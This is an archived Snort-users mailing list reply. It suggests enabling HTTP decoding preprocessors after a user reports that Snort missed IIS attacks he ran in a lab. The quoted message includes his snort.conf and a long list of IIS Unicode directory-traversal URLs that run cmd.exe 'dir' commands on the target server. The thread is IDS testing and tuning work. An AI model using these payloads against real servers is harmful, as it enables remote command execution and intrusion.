Re: Problem with web-iis rules

["Josh Berry" <josh.berry () netschematics com>]

You might want to turn on the http_decode preprocessor:

preprocessor http_decode: 80 unicode iis_alt_unicode double_encode
iis_flip_slash full_whitespace.

I also catch much more alerts with the stream preprocessors turned on.


> Hi there,
>
> I installed snort on my machine and launched a number of IIS attacks from
> my machine to another one in the LAN.  The other machine is running an
> unpatched iis4.0 and the attacks are successful.  Snort successfully
> reported the nmap portscans, however, it failed to report the iis attacks.
>  It seems to me that snort just doesn't load up the web-iis rules.  Below
> is my snort.conf, which is the default snort.conf with database output
> option.  Can anyone point out what's the problem with it?  Thanks.
>
>
> var HOME_NET any
> var EXTERNAL_NET any
> var DNS_SERVERS $HOME_NET
> var SMTP_SERVERS $HOME_NET
> var HTTP_SERVERS $HOME_NET
> var SQL_SERVERS $HOME_NET
> var TELNET_SERVERS $HOME_NET
> var HTTP_PORTS 80
> var SHELLCODE_PORTS !80
> var ORACLE_PORTS 1521
> var AIM_SERVERS
> [64.12.24.0/24,64.12.25.0/24,64.12.26.14/24,64.12.28.0/24,64.12.29.0/24,64.12.161.0/24,64.12.163.0/24,205.188.5.0/24,205.188.9.0/24]
> var RULE_PATH ../rules
> preprocessor frag2
> preprocessor rpc_decode: 111 32771
> preprocessor bo
>
> output database: log, mssql, dbname=alerts user=snortuser password=****
>
> include classification.config
> include reference.config
> include $RULE_PATH/bad-traffic.rules
> include $RULE_PATH/exploit.rules
> include $RULE_PATH/scan.rules
> include $RULE_PATH/finger.rules
> include $RULE_PATH/ftp.rules
> include $RULE_PATH/telnet.rules
> include $RULE_PATH/rpc.rules
> include $RULE_PATH/rservices.rules
> include $RULE_PATH/dos.rules
> include $RULE_PATH/ddos.rules
> include $RULE_PATH/dns.rules
> include $RULE_PATH/tftp.rules
> include $RULE_PATH/web-cgi.rules
> include $RULE_PATH/web-coldfusion.rules
> include $RULE_PATH/web-iis.rules
> include $RULE_PATH/web-frontpage.rules
> include $RULE_PATH/web-misc.rules
> include $RULE_PATH/web-client.rules
> include $RULE_PATH/web-php.rules
> include $RULE_PATH/sql.rules
> include $RULE_PATH/x11.rules
> include $RULE_PATH/icmp.rules
> include $RULE_PATH/netbios.rules
> include $RULE_PATH/misc.rules
> include $RULE_PATH/attack-responses.rules
> include $RULE_PATH/oracle.rules
> include $RULE_PATH/mysql.rules
> include $RULE_PATH/snmp.rules
>
> include $RULE_PATH/smtp.rules
> include $RULE_PATH/imap.rules
> include $RULE_PATH/pop2.rules
> include $RULE_PATH/pop3.rules
>
> include $RULE_PATH/nntp.rules
> include $RULE_PATH/other-ids.rules
> # include $RULE_PATH/web-attacks.rules
> # include $RULE_PATH/backdoor.rules
> # include $RULE_PATH/shellcode.rules
> # include $RULE_PATH/policy.rules
> # include $RULE_PATH/porn.rules
> # include $RULE_PATH/info.rules
> # include $RULE_PATH/icmp-info.rules
> # include $RULE_PATH/virus.rules
> # include $RULE_PATH/chat.rules
> # include $RULE_PATH/multimedia.rules
> # include $RULE_PATH/p2p.rules
> include $RULE_PATH/experimental.rules
> include $RULE_PATH/local.rules
>
> and here are the iis scripts I used:
>
> /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
> /_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
> /_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
> /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
> /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
> /_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
> /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
> /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
> /_vti_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
> /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
> /_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
> /_vti_bin/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
> /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
> /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
> /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
> /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
> /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
> /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
> /msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
> /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
> /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
> /msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
> /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
> /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
> /msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
> /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
> /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
> /msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
> /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir
> /script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
> /script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
> /script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
> /script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
> /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe
> /scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:\
> /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
> /scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:\
> /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
> /scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\
> /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
> /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:\
> /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
> /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
> /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
> /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
> /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
>
> -Yan


Thanks,
Josh Berry, CTO
LinkNet-Solutions
469-831-8543
josh.berry () linknet-solutions com



-------------------------------------------------------
This SF.net email is sponsored by: SF.net Giveback Program.
SourceForge.net hosts over 70,000 Open Source Projects.
See the people who have HELPED US provide better services:
Click here: http://sourceforge.net/supporters.php
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users